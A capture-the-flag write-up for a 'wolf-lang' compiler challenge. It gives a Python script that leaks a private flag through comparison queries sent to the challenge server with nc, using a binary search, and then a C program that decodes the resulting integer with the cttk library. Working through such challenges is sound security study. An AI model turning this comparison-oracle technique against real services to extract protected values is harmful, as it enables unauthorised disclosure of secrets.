### pupper

the **wolf-lang** program is a compiler, we can input program to get the private flag from the context which was injected when the compiler has parsed the input.

the nodus is that the program do not allow to print private variable. but we can use *compare operation* to bypass. so here is the code.

```
import subprocess
import math

def get_result(number):
open('test.sh', 'w').write("echo 'if (flag < {}) then 1 else 0' | nc wolf.chal.pwning.xxx 6808".format(number))
o = subprocess.check_output(["sh", "./test.sh"]).strip()
return o

start = 2 ** 200
end = 2 ** 300
current = (start + end) / 2

while current < end:
o = get_result(current)
print current, o
if o == '0 : int':
start = current + 1
else:
assert o == '1 : int'
end = current
current = (start + end) / 2
```

After running the code. we got the flag as an big integer 155924442406448791952071508005867319320207161537917133772976476023496189191734211081085

and then decode it to a string with cttk lib.

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stdarg.h>

#include "cttk.h"

static void decode(const char* in, int len) {
cti_def(val, 300);
cti_def(x, 300);
cti_def(ten, 300);
cti_init(ten, 300);
cti_set_u32(ten, 10);
cti_init(x, 300);
cti_init(val, 300);
cti_set_u32(val, 0);
int i = 0;
for (i = 0; i < len; ++i) {
cti_set_u32(x, (*(in + i) - '0'));
cti_mul(val, ten, val);
cti_add(val, val, x);
}
char dst[100];
memset(dst, 0, 100);
cti_encle(dst, 100, val);
printf("%s\n", dst);
}

int
main(void)
{ decode("155924442406448791952071508005867319320207161537917133772976476023496189191734211081085", 87);
return 0;
}
```

here we got the reversed flag.